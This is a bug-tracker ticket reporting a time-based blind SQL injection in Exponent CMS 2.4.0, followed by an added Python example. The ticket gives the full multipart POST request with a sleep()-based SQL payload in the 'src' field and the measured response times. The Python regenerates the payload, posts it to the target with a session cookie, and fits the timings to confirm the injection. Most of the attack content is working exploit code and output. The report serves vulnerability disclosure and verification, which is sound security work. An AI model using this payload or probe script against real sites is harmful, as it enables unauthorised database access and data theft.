#1390 new
Nicky

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0

Reported by Nicky | November 4th, 2016 @ 02:32 AM

POST /exponent/index.php HTTP/1.1
Content-Length: 865
Content-Type: multipart/form-data; boundary=-----Boundary_GVJVYRLGSF
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=671871947f2a01e5a385139b4131c7c1; adminer_key=9481c8797fb634e88f45043b9f1590fe; osp=0000
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="action"

update
-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="body"

1
-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="controller"

text
-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="id"

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="int"

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="rank"

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="revision_id"

-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="src"

(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
-------Boundary_GVJVYRLGSF
Content-Disposition: form-data; name="title"

Mr.
-------Boundary_GVJVYRLGSF--

POST (multipart) input src was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

Tests performed (payload sent in src => response time):
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 18.377 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 12.683 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.437 s
(select(0)from(select(sleep(2)))v)/*'+(select(0)from(select(sleep(2)))v)+'"+(select(0)from(select(sleep(2)))v)+"*/ => 6.349 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.624 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.967 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.998 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 13.104 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.234 s

Original value: @footer
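Added example, not the reporter's tooling and not Exponent CMS code: the Python below regenerates the multipart request from the ticket with the reporter's payload for an arbitrary sleep() value, and applies the check a practitioner would run over the timings above before calling a time-based blind injection confirmed: fit response time against the requested delay and require every sample to track the fitted line, so one slow response cannot produce a false positive. The payload places the same sub-select three times so that exactly one copy is live whether src lands in an unquoted, single-quoted or double-quoted SQL context, with the /* ... */ comment swallowing the rest. The target URL, boundary, form fields and cookie are copied from the request in the ticket; the probe function, the fit thresholds and the control dataset are this example's own assumptions. On the ticket's timings the fit gives about 3 s of delay per second of sleep(), which suggests the injected statement is executed about three times per request; the ticket itself does not say why.

```python
"""Reproduce and interpret the time-based blind SQLi probe from the ticket.

Added example; not the reporter's tool and not Exponent CMS code.
"""
import time
import urllib.request

# Target, boundary and cookie copied from the request in the ticket.
TARGET = "http://192.168.118.1/exponent/index.php"
BOUNDARY = "-----Boundary_GVJVYRLGSF"
COOKIE = ("PHPSESSID=671871947f2a01e5a385139b4131c7c1; "
          "adminer_key=9481c8797fb634e88f45043b9f1590fe; osp=0000")


def sleep_payload(seconds):
    """The reporter's payload, regenerated for a given MySQL sleep() delay.

    Three copies of the sub-select: one is live in an unquoted context, one
    after the closing single quote, one after the closing double quote; the
    /* ... */ comment hides whichever copies are not live.
    """
    s = f"(select(0)from(select(sleep({seconds})))v)"
    return f"{s}/*'+{s}+'\"+{s}+\"*/"


def form_fields(seconds):
    """The fields posted in the ticket, with src carrying the payload."""
    return {"action": "update", "body": "1", "controller": "text",
            "id": "", "int": "", "rank": "", "revision_id": "",
            "src": sleep_payload(seconds), "title": "Mr."}


def build_multipart(fields, boundary=BOUNDARY):
    """Encode fields as multipart/form-data with CRLF line endings."""
    lines = []
    for name, value in fields.items():
        lines += [f"--{boundary}",
                  f'Content-Disposition: form-data; name="{name}"',
                  "", value]
    lines += [f"--{boundary}--", ""]
    return "\r\n".join(lines).encode()


def probe(seconds, target=TARGET, cookie=COOKIE):
    """Send one probe and return wall-clock seconds until the response ends.

    Network call (assumed helper); only used from __main__, never on import.
    """
    req = urllib.request.Request(
        target, data=build_multipart(form_fields(seconds)), method="POST",
        headers={"Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
                 "X-Requested-With": "XMLHttpRequest", "Cookie": cookie})
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=60) as resp:
        resp.read()
    return time.monotonic() - start


def fit_delay(samples):
    """Least-squares fit of elapsed time against requested sleep().

    samples: (sleep_seconds, elapsed_seconds) pairs.
    Returns (slope, intercept, max_abs_residual). slope is seconds of extra
    delay per second of sleep(), i.e. roughly how many times the injected
    statement runs per request; intercept is the baseline response time.
    """
    samples = list(samples)
    n = len(samples)
    mx = sum(x for x, _ in samples) / n
    my = sum(y for _, y in samples) / n
    sxx = sum((x - mx) ** 2 for x, _ in samples)
    if sxx == 0:
        raise ValueError("need at least two distinct sleep() values")
    slope = sum((x - mx) * (y - my) for x, y in samples) / sxx
    intercept = my - slope * mx
    max_resid = max(abs(y - (intercept + slope * x)) for x, y in samples)
    return slope, intercept, max_resid


def is_time_based_injection(samples, jitter=1.0):
    """Verdict heuristic (thresholds are this example's assumption): delay
    must track sleep() at least one-for-one, and every sample must lie within
    `jitter` seconds of the fitted line."""
    slope, _, max_resid = fit_delay(samples)
    return slope >= 0.9 and max_resid <= jitter


# Measurements reported in the ticket: (sleep seconds, response seconds).
TICKET_SAMPLES = [(6, 18.377), (4, 12.683), (0, 0.437), (2, 6.349),
                  (0, 0.624), (0, 0.967), (0, 0.998), (4, 13.104), (0, 0.234)]

# Constructed control: timings a non-injectable parameter would produce.
CONTROL_SAMPLES = [(6, 0.51), (4, 0.48), (0, 0.44), (2, 0.52), (0, 0.47)]

if __name__ == "__main__":
    slope, base, resid = fit_delay(TICKET_SAMPLES)
    print(f"ticket: {slope:.2f} s per sleep second, base {base:.2f} s, "
          f"max residual {resid:.2f} s, "
          f"injection={is_time_based_injection(TICKET_SAMPLES)}")
    print(f"control: injection={is_time_based_injection(CONTROL_SAMPLES)}")
    # Live re-test (uncomment against a lab instance you are allowed to hit):
    # live = [(d, probe(d)) for d in (0, 2, 0, 4, 0, 6)]
    # print("live:", is_time_based_injection(live))
```

The control dataset is what you want to see when the same fields are replayed against a patched build: a slope near zero means sleep() never reached the database.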


Bug Tracker for Exponent CMS
